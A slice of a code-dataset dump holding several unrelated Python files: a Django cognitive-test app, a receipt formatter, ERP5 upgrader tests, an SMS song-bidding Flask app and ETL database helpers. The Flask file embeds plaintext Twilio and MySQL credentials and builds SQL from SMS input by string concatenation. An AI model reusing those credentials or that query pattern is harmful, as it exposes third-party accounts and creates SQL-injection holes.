profit\n","sub_path":"app/strategy/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"526092540","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom Authentication.models import Profile, Attempts\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .utils import get_plot\n# Create your views here.\n\n@login_required(login_url = 'login')\ndef home(request):\n return render(request, 'home.html')\n \n@login_required(login_url = 'login')\ndef TMTA(request):\n return render(request, 'TMTA.html')\n\n@login_required(login_url = 'login')\ndef TMTB(request):\n return render(request,'TMTB.html')\n\n@login_required(login_url = 'login')\ndef statistics(request):\n return render(request, 'statistics.html')\n\n@login_required(login_url = 'login')\ndef choice(request):\n return render(request, 'choice.html')\n\n\n@login_required(login_url = 'login')\ndef results(request):\n if request.method == \"POST\" and request.is_ajax():\n print(\"POST WORKS\")\n request_data = request.POST\n print(request_data)\n data_dict = request_data.dict()\n totalTime = int(data_dict['timeToComplete'])\n errors = int(data_dict['numOfErrors'])\n print(totalTime)\n print(errors)\n \n errorPerSec = errors / totalTime\n # 15 is number of buttons\n errorPencentage = errors/15\n current_user = request.user\n print(current_user.id)\n profile = Profile.objects.get(user=current_user.id)\n attempt = Attempts()\n attempt.user = profile\n #convert to seconds\n attempt.timeToComplete = totalTime\n attempt.numOfErrors = errors\n attempt.errorPerSec = errorPerSec\n attempt.errorPencentage = errorPencentage\n attempt.save()\n return HttpResponse(\"Okay\")\n \n context = {}\n return 
render(request, 'results.html', context)\n\n@login_required\ndef statistics(request):\n current_user = request.user\n profile = Profile.objects.get(user=current_user.id)\n attempt_obj = Attempts.objects.filter(user = profile).order_by('dateTime')\n y = [y.timeToComplete/1000 for y in attempt_obj]\n x = []\n for i in range(attempt_obj.count()):\n x.append(i+1)\n chart = get_plot(x,y)\n context = {'chart':chart}\n return render(request, 'statistics.html', context)","sub_path":"CZ3002Project/TrailMakingTest/TMT/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"243884727","text":"# coding: utf-8\n\ndef dados_loja_param(nome_loja, logradouro, numero, complemento, bairro,\n municipio, estado, cep, telefone, observacao, cnpj,\n inscricao_estadual):\n # Implemente aqui\n\n if not nome_loja:\n raise Exception (\"O campo nome da loja é obrigatório\")\n if not logradouro:\n raise Exception (\"O campo logradouro do endereço é obrigatório\")\n \n _logradouro = logradouro + \", \"\n _numero = \"s/n\" if numero == 0 else str(numero)\n _complemento = \" \" + complemento if complemento else \"\"\n _bairro = bairro + \" - \" if bairro else \"\"\n\n if not municipio:\n raise Exception (\"O campo município do endereço é obrigatório\")\n \n _municipio = municipio + \" - \"\n\n if not estado:\n raise Exception (\"O campo estado do endereço é obrigatório\")\n \n _cep = \"CEP:\" + cep if cep else \"\"\n _telefone = \"Tel \" + telefone if telefone else \"\"\n _telefone = \" \" + _telefone if cep and telefone else _telefone\n _observacao = observacao if observacao else \"\"\n\n if not cnpj:\n raise Exception (\"O campo CNPJ da loja é obrigatório\")\n \n _cnpj = \"CNPJ: \" + cnpj\n\n if not inscricao_estadual:\n raise Exception (\"O campo inscrição estadual da loja é obrigatório\")\n \n _inscricao_estadual = \"IE: \" + inscricao_estadual\n \n return 
(f\"\"\"{nome_loja}\n{_logradouro}{_numero}{_complemento}\n{_bairro}{_municipio}{estado}\n{_cep}{_telefone}\n{_observacao}\n{_cnpj}\n{_inscricao_estadual}\"\"\")","sub_path":"cupom.py","file_name":"cupom.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"216279698","text":"##############################################################################\n#\n# Copyright (c) 2002-2011 Nexedi SA and Contributors. All Rights Reserved.\n# Rafael Monnerat \n#\n# WARNING: This program as such is intended to be used by professional\n# programmers who take the whole responsibility of assessing all potential\n# consequences resulting from its eventual inadequacies and bugs\n# End users who are looking for a ready-to-use solution with commercial\n# guarantees and support are strongly adviced to contract a Free Software\n# Service Company\n#\n# This program is Free Software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n##############################################################################\n\n\nfrom Products.ERP5Type.tests.ERP5TypeLiveTestCase import ERP5TypeLiveTestCase\nfrom Products.ERP5Type.tests.utils import createZODBPythonScript\n\nclass TestLiveUpgrader(ERP5TypeLiveTestCase):\n \"\"\"\n Configurator Mixin Class\n \"\"\"\n def afterSetUp(self):\n self.login(user_name='test_configurator_user')\n self.upgrade_object_test_id = \"upgrade_object_test\"\n self.erp5_site_global_id = getattr(self.portal, 'erp5_site_global_id', None)\n self.beforeTearDown()\n self.portal.portal_activities.unsubscribe()\n\n def beforeTearDown(self):\n \"\"\" Restore original state \"\"\"\n self.portal.portal_activities.subscribe()\n custom = self.portal.portal_skins.custom\n\n for script_id in ['ERP5Site_getUpgraderSignature', 'ERP5Site_getUpgraderSignature']: \n if script_id in custom.objectIds():\n custom.manage_delObjects([script_id])\n\n if self.upgrade_object_test_id in self.portal.portal_categories.objectIds():\n self.portal.portal_categories.manage_delObjects([self.upgrade_object_test_id])\n\n if self.upgrade_object_test_id in self.portal.portal_gadgets.objectIds():\n self.portal.portal_gadgets.manage_delObjects([self.upgrade_object_test_id])\n\n self.portal._updateProperty('erp5_site_global_id', self.erp5_site_global_id)\n \n property_sheet_list = self.portal.portal_types.Person.getTypePropertySheetList()\n new_property_sheet_list = [ i for i in property_sheet_list if i !=\"Account\" ]\n self.portal.portal_types.Person.setTypePropertySheetList(new_property_sheet_list)\n self.assertFalse(\"Account\" in self.portal.portal_types.Person.getTypePropertySheetList())\n\n self.tic()\n 
ERP5TypeLiveTestCase.beforeTearDown(self)\n\n def test_UpgradeSignatureAPI(self):\n \"\"\"\n test If the script that defines the signature follow\n the API defined here. This will prevent mistakes\n or change API Definition.\n \"\"\"\n signature_key_list = ('alarm_dict',\n 'workflow_chain_dict',\n 'required_bt5_id_list',\n 'upgradable_bt5_id_list',\n 'update_catalog_bt5_id_list',\n 'before_triggered_bt5_id_dict',\n 'after_triggered_bt5_id_dict',\n 'reinstalable_bt5_id_list',\n 'keep_original_dict',\n 'object_action_dict',\n 'integrity_verification_script_id_list',\n 'catalog_filter_dict',\n 'update_role_portal_type_list',\n 'portal_type_property_sheet_list',\n 'erp5_site_property_dict',\n 'upgrade_object_class_list',\n 'recatalog',\n 'alarm_tool_configuration_list'\n )\n signature = self.portal.ERP5Site_getUpgraderSignature()\n self.assertEqual(sorted(signature_key_list), sorted(signature.keys()))\n\n def test_StandardUpgraderSignature(self):\n \"\"\" Test default behaviours provided by default ERP5Site_getUpgraderSignature\n \"\"\"\n signature = self.portal.ERP5Site_getUpgraderSignature()\n # By default we do not recatalog the instance\n self.assertEqual(signature['recatalog'], False)\n\n # By default we do not upgrade manually the workflow\n self.assertEqual(signature['workflow_chain_dict'], None)\n\n # By Default we do not upgrade Catalog Filters\n self.assertEqual(signature['catalog_filter_dict'], None)\n\n # By Default there is no extra properties to set.\n self.assertEqual(signature['erp5_site_property_dict'], {})\n\n # Do not enable alarms by default\n self.assertEqual(signature['alarm_tool_configuration_list'], ())\n\n # By default we upgrade software, products, bt5 and so on.\n self.assertTrue(signature['alarm_dict'][\"bt5_upgrader\"])\n self.assertTrue(signature['alarm_dict'][\"finalize_upgrader\"])\n\n # By default there is nothing to fix on skin Selection.\n # (rafael) Is it really necessary?\n 
self.assertFalse(self.portal.ERP5Site_setupUpgraderSkinSelection())\n\n def testUpgradeObjectWorkflowState(self):\n \"\"\"\n Create a test to ERP5Site_upgradeObjectList which aims to update\n Objects which are in bad workflow state or have a bad property.\n \n Signature API:\n\n { BUSINESS_TEMPLATE_TITLE : (\n\t (OBJECT_PATH,\n\t SCRIPT TO COLLECT INFORMATION,\n RETURN EXPECTED THAT INDICATES THE OBJECT IS BROKEN, \n\t\t\t SCRIPT USED TO FIX ),\n\t ),\n }\n \"\"\"\n signature_code = {'erp5_core':( ('portal_categories/%s' % self.upgrade_object_test_id,\n 'getValidationState', \n 'embedded', \n 'publish'),)}\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_getUpgraderSignature', \"item=None\",\n \"return \" + str(signature_code))\n self.commit()\n self.assertEqual(self.portal.ERP5Site_getUpgraderSignature(), signature_code)\n self.assertEqual(self.portal.ERP5Site_upgradeObjectList(), [])\n test_object = self.portal.portal_categories.newContent(id=self.upgrade_object_test_id,\n portal_type=\"Base Category\")\n self.assertEqual(test_object.getValidationState(), 'embedded')\n self.assertNotEquals(self.portal.ERP5Site_upgradeObjectList(), [])\n self.assertNotEquals(self.portal.ERP5Site_upgradeObjectList(upgrade=\"1\"), [])\n self.assertEqual(test_object.getValidationState(), 'published')\n\n def testUpgradeObjectClass(self):\n \"\"\"\n Verify if all objects from one class are migrated to\n another class.\n \"\"\"\n to_class_as_string = 'Products.ERP5Type.Document.Folder.Folder'\n signature_code = ( ('portal_gadgets', \n 'ERP5Site_testUpgradeObjectClass',\n to_class_as_string, \n 'Products.ERP5Type.Document.Gadget.Gadget', \n 'ERP5Site_testUpgradeObjectClass'), )\n\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_getUpgraderSignature', \"item=None\",\n \"return \" + str(signature_code))\n self.commit()\n self.assertEqual(self.portal.ERP5Site_getUpgraderSignature(), signature_code)\n # Nothing to upgrade\n 
self.assertEqual(self.portal.ERP5Site_upgradeObjectClass(), [])\n\n # Create one broken object\n gadget = self.portal.portal_gadgets.newContent(portal_type=\"Gadget\", \n id=self.upgrade_object_test_id)\n self.tic()\n\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n \"test_upgradeObject\", 'x', 'return [1]')\n test_script = self.getPortal().portal_skins.custom.test_upgradeObject\n self.portal.portal_gadgets.upgradeObjectClass(\n test_script,\n gadget.__class__,\n to_class_as_string,\n test_script)\n\n self.commit()\n self.assertNotEquals(self.portal.ERP5Site_upgradeObjectClass(), [])\n self.assertEqual(self.portal.ERP5Site_upgradeObjectClass(upgrade=1),\n [(gadget.getRelativeUrl(), 'ERP5 Gadget')])\n self.tic()\n self.assertEqual(self.portal.ERP5Site_upgradeObjectClass(), [])\n\n def test_UpgradeGlobalPropertyList(self):\n \"\"\"\n Verify if the upgrade is needed\n \"\"\"\n if getattr(self.portal, 'erp5_site_global_id', None) is not None:\n self.portal._updateProperty('erp5_site_global_id', \"SOME_KEY\")\n\n signature_code = {'erp5_site_global_id': self.upgrade_object_test_id}\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_getUpgraderSignature', \"item=None\",\n \"return \" + str(signature_code))\n self.commit()\n self.assertEqual(self.portal.ERP5Site_getUpgraderSignature(), signature_code)\n self.assertEqual(self.portal.ERP5Site_upgradeGlobalPropertyList(), \n [\"Upgrade Required for Global Properties.\"])\n\n self.assertEqual([\"Upgrade Executed for Global Properties (erp5_site_global_id).\"], \n self.portal.ERP5Site_upgradeGlobalPropertyList(upgrade=1))\n\n self.tic()\n self.assertEqual(self.portal.ERP5Site_upgradeGlobalPropertyList(), [])\n self.assertEqual(getattr(self.portal, 'erp5_site_global_id', None),\n self.upgrade_object_test_id)\n\n def test_UpgradeWorkflowChain(self):\n \"\"\"\n Upgrade the workflow chain if required.\n \"\"\"\n workflow_tool = self.portal.portal_workflow\n workflow_dict = 
workflow_tool.getWorkflowChainDict()\n signature_code = workflow_dict\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_getUpgraderSignature', \"item=None\",\n \"return \" + str(signature_code))\n self.commit()\n\n self.assertEqual(self.portal.ERP5Site_upgradeWorkflowChain(), [])\n\n original_person_chain = workflow_dict[\"chain_Person\"]\n # Modify installed workflow chain.\n workflow_dict[\"chain_Person\"] = ''\n workflow_tool.manage_changeWorkflows(default_chain = '', \n props = workflow_dict)\n self.assertEqual(workflow_tool.getWorkflowChainDict()[\"chain_Person\"],\n \"\")\n self.assertEqual(self.portal.ERP5Site_upgradeWorkflowChain(),\n [\"Upgrade Required for Workflow Chain.\"])\n\n self.assertEqual(self.portal.ERP5Site_upgradeWorkflowChain(upgrade=1),\n [\"Upgrade Executed for Workflow Chain.\"])\n self.tic()\n self.assertEqual(self.portal.ERP5Site_upgradeWorkflowChain(),[])\n self.assertEqual(workflow_tool.getWorkflowChainDict()[\"chain_Person\"],\n original_person_chain)\n\n def test_RunVerificationScriptDontRaise(self):\n \"\"\" Test if the script ERP5Site_runVerificationScript is \n bullet of proof, and always return a result.\n \"\"\"\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_raise', \"\",\n \"raise ValueError('Error')\")\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_return', \"\",\n \"return ['A']\")\n\n failure = self.portal.ERP5Site_runVerificationScript(\"ERP5Site_raise\")\n self.assertTrue(\"Script ERP5Site_raise fail to run\" in failure,\n \"'Script ERP5Site_raise fail to run not' in %s\" % failure)\n self.assertEqual('ERP5Site_return : \\n - A ',\n self.portal.ERP5Site_runVerificationScript(\"ERP5Site_return\"))\n\n def test_UpgradePortalTypePropertySheet(self):\n \"\"\"\n Test for Upgrate Portal Type Property Sheet script.\n \"\"\"\n signature_code = (('Account', [\"Person\"]), )\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 
'ERP5Site_getUpgraderSignature', \"item=None\",\n \"return \" + str(signature_code))\n self.commit()\n self.assertEqual(self.portal.ERP5Site_getUpgraderSignature(), signature_code)\n self.assertEqual(self.portal.ERP5Site_upgradePortalTypePropertySheet(),\n [\"Person doesn't has Account associated.\"])\n self.assertEqual(self.portal.ERP5Site_upgradePortalTypePropertySheet(upgrade=1),\n [\"Associate PropertySheet Account into Portal Type Person.\"])\n self.tic()\n self.assertEqual(self.portal.ERP5Site_upgradePortalTypePropertySheet(), [])\n\n\n def test_recreateActivities(self):\n \"\"\"\n The activities should be recreated after upgrade products.\n \"\"\"\n object_to_test = self.portal.portal_simulation\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_testRecreateActivityScript', \"\",\n \"context.manage_addProperty('custom_property_without_meaning', 'I was there', 'string')\")\n\n self.commit()\n object_to_test.activate().ERP5Site_testRecreateActivityScript()\n\n self.commit()\n # Verify if the final activity is created.\n self.assertTrue(object_to_test.hasActivity(method_id=\"ERP5Site_testRecreateActivityScript\"))\n self.portal.portal_activities.activate().ERP5Site_clearActivities()\n self.commit()\n self.assertTrue(object_to_test.hasActivity(method_id=\"ERP5Site_testRecreateActivityScript\"))\n self.assertTrue(self.portal.portal_activities.hasActivity(method_id='ERP5Site_clearActivities'))\n self.tic()\n self.assertFalse(object_to_test.hasActivity(method_id=\"ERP5Site_testRecreateActivityScript\"))\n self.assertFalse(self.portal.portal_activities.hasActivity(method_id='ERP5Site_clearActivities'))\n self.assertEqual(object_to_test.getProperty('custom_property_without_meaning'),\n 'I was 
there')\n","sub_path":"bt5/erp5_upgrader/TestTemplateItem/portal_components/test.erp5.testLiveUpgrader.py","file_name":"test.erp5.testLiveUpgrader.py","file_ext":"py","file_size_in_byte":14492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"227184062","text":"import requests\nfrom flask import Flask,render_template,request,url_for\nimport json\nimport time\nimport mysql.connector\n\nfrom twilio.rest import Client\nfrom twilio.twiml.messaging_response import MessagingResponse\n\nfrom libsoundtouch import soundtouch_device\nfrom libsoundtouch.utils import Source, Type\n\napp = Flask(__name__)\n\nsongBeingPlayed = 0\nsongPlayedName = \"test\"\n\ncurrent_volume = 50\n\n# Volume up\n# @app.route(\"/volumeUp\", methods=['POST'])\n# def volume_up():\n# \tnew_volume = current_volume + 20\n# \tchange_volume(new_volume)\n# \tcurrent_volume = new_volume\n#\n# # Volume down\n# @app.route(\"/volumeDown\", methods=['POST'])\n# def volume_down():\n# new_volume = current_volume - 20\n# change_volume(new_volume)\n# current_volume = new_volume\n\n@app.route(\"/\")\ndef index():\n\tstartDj()\n\treturn render_template(\"index.html\")\n\n@app.route(\"/sms\", methods=['GET', 'POST'])\ndef sms_ahoy_reply():\n\tmobile_no = request.values.get('From',None)\n\tbody = request.values.get('Body', None)\n\tsongId = body.split(\" \")[0]\n\tbidAmt = body.split(\" \")[1]\n\tres = update(mobile_no,bidAmt,songId)\n\tresp = MessagingResponse()\n\tif res :\n\t\tsend_sms(mobile_no,\"Thank you for your bid!\")\n\telse :\n\t\tsend_sms(mobile_no,\"Not Enough Credit!\")\n\n\ndef send_sms(number, messageBody):\n\tprint(number)\n\taccount_sid = 'ACf3d029ace0ab2f696f9f971c11696f91'\n\tauth_token = '14ac526739b259838c2f67becc772b6f'\n\tclient = Client(account_sid, auth_token)\n\n\tmessage = client.messages \\\n\t\t.create(\n\t\tbody=messageBody,\n\t\tfrom_='+12028312095',\n\t\tto=number\n\t)\n\tprint(message.sid)\n\n\ndef playSong1(track):\n\tdevice = 
soundtouch_device('192.168.1.168')\n\n\t#device.power_on()\n\ttrackToPlay = 'spotify:track:'+track\n\tprint(device.config.name)\n\tresp = device.play_media(Source.SPOTIFY, trackToPlay, '5yz9rfw854rb39vkepel9jh3f')\n\tprint(resp)\n\n\ndef getCurrentSongDuration():\n\tURL = \"http://192.168.1.168:8090/now_playing\"\n\tdevice = soundtouch_device('192.168.1.168')\n\tprint(device.status().content_item.source_account)\n\t# device.power_on()\n\tprint(device.config.name)\n\tresp = (device.status())\n\n\treturn resp.duration\n\n\ndef startDj():\n\ti = 0\n\twhile i < 6 :\n\t\ttrack = getNextSong()\n\t\tplaySong1(track)\n\t\ttimeToSleep = getCurrentSongDuration()\n\t\ttime.sleep(timeToSleep)\n\t\ti = i+1\n\n\n\ndef getNextSong():\n\tcnx = mysql.connector.connect(user='be3bc40df921df', password='c7708685',\n\t\t\t\t\t\t\t\t host='us-cdbr-iron-east-04.cleardb.net',\n\t\t\t\t\t\t\t\t database='heroku_67d188873be555e')\n\n\tcursor = cnx.cursor()\n\n\tfirst_query = 'update songs set playsong = 1 where playsong = 3'\n\tcursor.execute(first_query)\n\tcnx.commit()\n\n\tquery = (\"select id, song_name, song_id from songs where playsong = 0 order by bid_amt desc limit 1;\")\n\tcursor.execute(query)\n\n\tfor (id) in cursor:\n\t\tid_temp = id[2]\n\t\tsongPlayedName = id[1]\n\t\tsongBeingPlayed = id_temp\n\t\tid_song = id[0]\n\n\tBASE_URL = 'update songs set playsong = 3 where id = '\n\n\tquery2 = (BASE_URL + str(id_song) +';')\n\tcursor.execute(query2)\n\tcnx.commit()\n\tcursor.close()\n\tcnx.close()\n\treturn id_temp\n\n@app.route(\"/pauseSong\", methods=['GET', 'POST'])\ndef pauseSong():\n\turl = \"http://192.168.1.168:8090/key\"\n\n\tpayload = \"PLAY_PAUSE\"\n\theaders = {\n\t\t'Content-Type': \"text/plain\",\n\t\t'User-Agent': \"PostmanRuntime/7.15.0\",\n\t\t'Accept': \"*/*\",\n\t\t'Cache-Control': \"no-cache\",\n\t\t'Postman-Token': \"5d036cf0-9330-42ef-8197-a224cfc4036a,12a332e9-be32-440d-9cf5-dce748f6b16e\",\n\t\t'Host': \"192.168.1.168:8090\",\n\t\t'accept-encoding': \"gzip, 
deflate\",\n\t\t'content-length': \"50\",\n\t\t'Connection': \"keep-alive\",\n\t\t'cache-control': \"no-cache\"\n\t}\n\n\tresponse = requests.request(\"POST\", url, data=payload, headers=headers)\n\tprint(response.text)\n\n\n@app.route(\"/current\", methods=['GET', 'POST'])\ndef currentSong():\n\tcnx = mysql.connector.connect(user='be3bc40df921df', password='c7708685',\n\t\t\t\t\t\t\t\t host='us-cdbr-iron-east-04.cleardb.net',\n\t\t\t\t\t\t\t\t database='heroku_67d188873be555e')\n\n\tcursor = cnx.cursor()\n\tquery = (\"select id, song_name, song_id from songs where playsong = 3;\")\n\tcursor.execute(query)\n\tfor (id) in cursor:\n\t\tid_temp = id[2]\n\t\tsongPlayedName1= id[1]\n\t\tsongBeingPlayed = id_temp\n\t\tid_song = id[0]\n\t\treturn songPlayedName1\n\treturn songPlayedName\n\n\n@app.route(\"/bidData\", methods=['GET', 'POST'])\ndef currentBid():\n\tcnx = mysql.connector.connect(user='be3bc40df921df', password='c7708685',\n\t\t\t\t\t\t\t\t host='us-cdbr-iron-east-04.cleardb.net',\n\t\t\t\t\t\t\t\t database='heroku_67d188873be555e')\n\n\tcursor = cnx.cursor()\n\tquery = (\"select song_name, bid_amt from songs order by bid_amt desc;\")\n\tcursor.execute(query)\n\n\tsongs = []\n\tbids = []\n\tfor (id) in cursor:\n\t\tsongs.append(id[0])\n\t\tbids.append(id[1])\n\n\tsong_json = []\n\tfor i in range(len(bids)):\n\t\tsong_json.append({'name': songs[i], 'bid': bids[i]})\n\n\n\tcursor.close()\n\tcnx.close()\n\treturn json.dumps(song_json)\n\n\ndef update(phoneNum, bid, song_id):\n\tph = phoneNum\n\tph = ph.replace(\"+\",\"\")\n\tcnx = mysql.connector.connect(user='be3bc40df921df', password='c7708685',\n\t\t\t\t\t\t\t\t host='us-cdbr-iron-east-04.cleardb.net',\n\t\t\t\t\t\t\t\t database='heroku_67d188873be555e')\n\n\tcursor = cnx.cursor()\n\tquery = (\"select id, credits from users where mob_num=\" + str(ph) + \";\")\n\tcursor.execute(query)\n\n\tfor (id) in cursor:\n\t\tuser_id = id[0]\n\t\tuser_bid = id[1]\n\t\tif int(bid) > int(id[1]):\n\t\t\treturn 
False\n\n\tquery4 = (\"select bid_amt from songs where id=\" + str(song_id) + \";\")\n\tcursor.execute(query4)\n\n\tsong_bid = 0\n\tfor (id) in cursor:\n\t\tsong_bid = id[0]\n\n\tquery2 = (\"update users set credits = \" + str(int(user_bid) - int(bid)) + \" where id = \" + str(user_id) + \";\")\n\tcursor.execute(query2)\n\tcnx.commit()\n\tquery3 = (\"update songs set bid_amt = \" + str(int(song_bid) + int(bid)) + \" where id =\" + str(song_id) + \";\")\n\tcursor.execute(query3)\n\n\tcnx.commit()\n\tcursor.close()\n\tcnx.close()\n\treturn True\n\n\n\n@app.route(\"/volume\", methods=['POST'])\ndef change_volume(desired_volume):\n url = \"http://192.168.1.168:8090/volume\"\n payload = \"%d\" % desired_volume\n headers = {\n 'Content-Type': \"text/plain\",\n 'User-Agent': \"PostmanRuntime/7.15.0\",\n 'Accept': \"*/*\",\n 'Cache-Control': \"no-cache\",\n 'Postman-Token': \"43ba8630-7c82-4265-bc13-0a1ce1e00b2e,625dc2c5-40fe-4e4b-83aa-8da21ec7e521\",\n 'Host': \"192.168.1.168:8090\",\n 'accept-encoding': \"gzip, deflate\",\n 'content-length': \"19\",\n 'Connection': \"keep-alive\",\n 'cache-control': \"no-cache\"\n }\n response = requests.request(\"POST\", url, data=payload, headers=headers)\n\n\n\nif __name__ == '__main__':\n\tapp.run(host=\"127.0.0.1\",port=8080,debug=True)","sub_path":"Deploying ML Flask App to GCP/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"407791106","text":"\"\"\"\nRun ETL routines\n\"\"\"\nimport click\nimport logging\nfrom math import ceil\nfrom typing import Any, Optional\nfrom id3c.db.session import DatabaseSession\nfrom id3c.db.datatypes import Json\nfrom id3c.cli import cli\nfrom id3c.db.types import MinimalSampleRecord\n\n\nLOG = logging.getLogger(__name__)\n\n\n@cli.group(\"etl\", help = __doc__)\ndef etl():\n pass\n\n\n# Load all ETL subcommands.\n__all__ = [\n \"enrollments\",\n \"manifest\",\n 
\"presence_absence\",\n \"kit\",\n \"consensus_genome\",\n \"redcap_det\",\n \"fhir\",\n]\n\ndef find_or_create_site(db: DatabaseSession, identifier: str, details: dict) -> Any:\n \"\"\"\n Select encounter site by *identifier*, or insert it if it doesn't exist.\n \"\"\"\n LOG.debug(f\"Looking up site «{identifier}»\")\n\n site = db.fetch_row(\"\"\"\n select site_id as id, identifier\n from warehouse.site\n where identifier = %s\n \"\"\", (identifier,))\n\n if site:\n LOG.info(f\"Found site {site.id} «{site.identifier}»\")\n else:\n LOG.debug(f\"Site «{identifier}» not found, adding\")\n\n data = {\n \"identifier\": identifier,\n \"details\": Json(details),\n }\n\n site = db.fetch_row(\"\"\"\n insert into warehouse.site (identifier, details)\n values (%(identifier)s, %(details)s)\n returning site_id as id, identifier\n \"\"\", data)\n\n LOG.info(f\"Created site {site.id} «{site.identifier}»\")\n\n return site\n\n\ndef upsert_individual(db: DatabaseSession, identifier: str, sex: str = None) -> Any:\n \"\"\"\n Upsert individual by their *identifier*.\n \"\"\"\n LOG.debug(f\"Upserting individual «{identifier}»\")\n\n data = {\n \"identifier\": identifier,\n \"sex\": sex,\n }\n\n individual = db.fetch_row(\"\"\"\n insert into warehouse.individual (identifier, sex)\n values (%(identifier)s, %(sex)s)\n\n on conflict (identifier) do update\n set sex = excluded.sex\n\n returning individual_id as id, identifier\n \"\"\", data)\n\n assert individual.id, \"Upsert affected no rows!\"\n\n LOG.info(f\"Upserted individual {individual.id} «{individual.identifier}»\")\n\n return individual\n\n\ndef upsert_encounter(db: DatabaseSession,\n identifier: str,\n encountered: str,\n individual_id: int,\n site_id: int,\n age: Optional[str],\n details: dict) -> Any:\n \"\"\"\n Upsert encounter by its *identifier*.\n \"\"\"\n LOG.debug(f\"Upserting encounter «{identifier}»\")\n\n data = {\n \"identifier\": identifier,\n \"encountered\": encountered,\n \"individual_id\": individual_id,\n 
\"site_id\": site_id,\n \"age\": age,\n \"details\": Json(details),\n }\n\n encounter = db.fetch_row(\"\"\"\n insert into warehouse.encounter (\n identifier,\n individual_id,\n site_id,\n encountered,\n age,\n details)\n values (\n %(identifier)s,\n %(individual_id)s,\n %(site_id)s,\n %(encountered)s::timestamp with time zone,\n %(age)s,\n %(details)s)\n\n on conflict (identifier) do update\n set individual_id = excluded.individual_id,\n site_id = excluded.site_id,\n encountered = excluded.encountered,\n age = excluded.age,\n details = excluded.details\n\n returning encounter_id as id, identifier\n \"\"\", data)\n\n assert encounter.id, \"Upsert affected no rows!\"\n\n LOG.info(f\"Upserted encounter {encounter.id} «{encounter.identifier}»\")\n\n return encounter\n\n\ndef find_sample_by_id(db: DatabaseSession, sample_id: int) -> Any:\n \"\"\"\n Find sample by *sample_id* and return sample.\n \"\"\"\n LOG.debug(f\"Looking up sample «{sample_id}»\")\n\n sample = db.fetch_row(\"\"\"\n select sample_id as id, identifier, encounter_id\n from warehouse.sample\n where sample_id = %s\n for update\n \"\"\", (sample_id,))\n\n if not sample:\n LOG.error(f\"No sample with id «{sample_id}» found\")\n return None\n\n LOG.info(f\"Found sample {sample.id} «{sample.identifier}»\")\n return sample\n\n\ndef update_sample(db: DatabaseSession,\n sample,\n encounter_id: Optional[int]=None) -> Optional[MinimalSampleRecord]:\n \"\"\"\n Update sample's encounter_id.\n \"\"\"\n LOG.debug(f\"Updating sample {sample.id}, linked to encounter {encounter_id}\")\n\n if sample.encounter_id:\n assert sample.encounter_id == encounter_id, \\\n f\"Sample {sample.id} already linked to another encounter {sample.encounter_id}\"\n return None\n\n sample = db.fetch_row(\"\"\"\n update warehouse.sample\n set encounter_id = %s\n where sample_id = %s\n returning sample_id as id, identifier\n \"\"\", (encounter_id, sample.id))\n\n assert sample.id, \"Updating encounter_id affected no rows!\"\n\n 
LOG.info(f\"Updated sample {sample.id}\")\n\n return sample\n\n\ndef age(document: dict) -> Optional[str]:\n \"\"\"\n Given a *document*, retrieve age value and\n return as a string to fit the interval format.\n\n If no value is given for age, then will just return None.\n \"\"\"\n age = document.get(\"age\")\n if age is None:\n return None\n return f\"{float(age)} years\"\n\n\ndef age_to_delete(age: Optional[Any]) -> Optional[dict]:\n \"\"\"\n TODO: Delete this function once we remove age from details\n Given an *age*, return a dict containing its 'value' and a boolean for\n 'ninetyOrAbove'.\n Currently applys math.ceil() to age to match the age from Audere.\n This may change in the future as we push to report age in months for\n participants less than 1 year old.\n If no value is given for *age*, then will just retun None.\n \"\"\"\n if age is None:\n return None\n\n return {\n \"value\": min(ceil(float(age)), 90),\n \"ninetyOrAbove\": ceil(float(age)) >= 90\n }\n\n\ndef find_sample(db: DatabaseSession, identifier: str, for_update = True) -> Any:\n \"\"\"\n Find sample by *identifier* and return sample.\n \"\"\"\n LOG.debug(f\"Looking up sample «{identifier}»\")\n\n query_ending = \"\"\n\n if for_update:\n query_ending = \"for update\"\n\n sample = db.fetch_row(\"\"\"\n select sample_id as id, identifier, encounter_id\n from warehouse.sample\n where identifier = %s or\n collection_identifier = %s\n \"\"\" + query_ending, (identifier,identifier,))\n\n if not sample:\n LOG.info(f\"No sample with identifier «{identifier}» found\")\n return None\n\n LOG.info(f\"Found sample {sample.id} «{sample.identifier}»\")\n return sample\n\n\ndef find_location(db: DatabaseSession, scale: str, identifier: str) -> Any:\n \"\"\"\n Find a location by *scale* and *identifier*.\n \"\"\"\n LOG.debug(f\"Looking up location {(scale, identifier)}\")\n\n location = db.fetch_row(\"\"\"\n select location_id as id, scale, identifier, hierarchy\n from warehouse.location\n where (scale, 